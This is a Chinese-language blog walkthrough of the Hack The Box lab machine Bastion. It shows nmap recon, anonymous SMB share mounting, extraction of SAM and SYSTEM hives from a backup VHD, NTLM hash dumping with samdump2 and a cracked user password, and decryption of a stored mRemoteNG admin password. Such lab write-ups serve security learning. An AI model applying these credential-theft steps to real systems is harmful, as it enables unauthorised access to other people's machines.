[HTB] Bastion Walkthrough - Flydragon's Blog

前言#

這台是 Hack The Box 的 Bastion，難度是 Easy

使用到的技巧：

Mount smb to kali
Extract password from SAM and SYSTEM (.vhd file)
Insecure mRemoteNG

Attacker: 10.10.16.2
Target: 10.10.10.134

Recon#

nmap

1
sudo nmap -sV -sC 10.10.10.134

1
PORT    STATE SERVICE      VERSION
2
22/tcp  open  ssh          OpenSSH for_Windows_7.9 (protocol 2.0)
3
| ssh-hostkey:
4
|   2048 3a:56:ae:75:3c:78:0e:c8:56:4d:cb:1c:22:bf:45:8a (RSA)
5
|   256 cc:2e:56:ab:19:97:d5:bb:03:fb:82:cd:63:da:68:01 (ECDSA)
6
|_  256 93:5f:5d:aa:ca:9f:53:e7:f2:82:e6:64:a8:a3:a0:18 (ED25519)
7
135/tcp open  msrpc        Microsoft Windows RPC
8
139/tcp open  netbios-ssn  Microsoft Windows netbios-ssn
9
445/tcp open  microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds
10
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
11

12
Host script results:
13
| smb-security-mode:
14
|   account_used: guest
15
|   authentication_level: user
16
|   challenge_response: supported
17
|_  message_signing: disabled (dangerous, but default)
18
| smb-os-discovery:
19
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
20
|   Computer name: Bastion
21
|   NetBIOS computer name: BASTION\x00
22
|   Workgroup: WORKGROUP\x00
23
|_  System time: 2024-05-09T07:55:56+02:00
24
| smb2-time:
25
|   date: 2024-05-09T05:56:00
26
|_  start_date: 2024-05-09T05:48:18
27
| smb2-security-mode:
28
|   3.1.1:
29
|_    Message signing enabled but not required
30
|_clock-skew: mean: -44m56s, deviation: 1h09m16s, median: -4m57s

看起來是要玩 smb

smbclient

先看有哪些 Share

1
smbclient -N -L \\\\10.10.10.134\\

1
Sharename       Type      Comment
2
---------       ----      -------
3
ADMIN$          Disk      Remote Admin
4
Backups         Disk
5
C$              Disk      Default share
6
IPC$            IPC       Remote IPC

有個 Backups

1
smbclient -N \\\\10.10.10.134\\Backups

連上之後逛一下找到這個路徑，裡面有兩個 .vhd 檔案，用 get 載下來

1
smb: \WindowsImageBackup\L4mpje-PC\Backup 2019-02-22 124351\>

Exploit#

9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd 這個檔案很大
載很久才載完，所以先看這個

1
7z x 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd

直接 segmentation fault
不過有些檔案已經解出來了，但 Windows\System32\config 底下沒有 SAM 跟 SYSTEM
另一個檔案就可以解出來，但沒看到什麼特別的東西

查了一下看到這篇文章
https://infinitelogins.com/2020/12/11/how-to-mount-extract-password-hashes-vhd-files/
照著做嘗試 mount vhd 到 kali 上

1
sudo apt install libguestfs-tools -y

1
sudo mkdir /mnt/vhd

1
guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro -v /mnt/vhd

做完之後 /mnt/vhd 還是空的，推測一開始就沒有載完整
嘗試直接從 target mount 過來

1
sudo mount -t cifs //10.10.10.134/backups /mnt/backups -o user=,password=

成功了！ alt text

接下來再 mount vhd

1
sudo guestmount --add 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd --inspector --ro -v /mnt/vhd

alt text

複製 SAM 跟 SYSTEM 出來

1
sudo cp vhd/Windows/System32/config/SAM ~/HTB/machine/Bastion

1
sudo cp vhd/Windows/System32/config/SYSTEM ~/HTB/machine/Bastion

dump 出 password hash

1
samdump2 SYSTEM SAM

1
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
2
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
3
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::

丟 crackstation alt text 拿到 L4mpje 的 password

1
bureaulampje

拿到 user shell alt text

Privilege Escalation#

沒有權限下 systeminfo，開的權限不知道有什麼提權的招
alt text

不過 Program Files (x86) 裡面有 mRemoteNG

在 C:\Users\L4mpje\AppData\Roaming\mRemoteNG\confCons.xml 裡面會有 admin 的 password

1
<Node Name="DC" Type="Connection" Descr="" Icon="mRemoteNG" Panel="General" Id="50
2
0e7d58-662a-44d4-aff0-3a4f547a3fee" Username="Administrator" Domain="" Password="aEWNF
3
V5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw==" H
4
ostname="127.0.0.1" ......

看起來像 base64 但解出來是亂碼，再查一下找到這個
https://github.com/haseebT/mRemoteNG-Decrypt

用這個腳本解出密碼 alt text

連上後取得 admin shell alt text